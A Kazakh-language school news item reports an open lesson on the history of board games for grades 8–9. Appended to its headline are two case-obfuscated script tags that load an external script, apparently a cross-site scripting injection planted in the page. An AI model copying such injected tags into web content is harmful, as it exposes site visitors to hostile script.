Жаратылыстану-математика және гуманитарлық ғылымдар онкүндігі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.01.2025

2025 жылдың 22 қаңтар күні мектебімізде жаратылыстану-математика және гуманитарлық пәндер онкүндігі аясында көркем еңбек пәнінің мұғалімі Жетенов Нұржан Мұратбекұлы 8-9 қазақ сыныптарында “Үстел ойындары. Шығу тарихы” тақырыбында ашық сабақ өткізді.

Сабақ барысында оқушыларға үстел ойындарының негізгі шарттарын түсіндіру арқылы олардың логикалық ойлау қабілеті мен ой-өрісін дамытты. Сонымен қатар, шыдамдылыққа, жылдамдыққа үйренуге мүмкіндік берді. Оқушылар үстел ойындарының шығу тарихы туралы да қызықты әрі тың мәліметтер алды.

ӘБ жетекшісі: Муханбеталина Г.К.

Просмотров: 1024

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу
Текст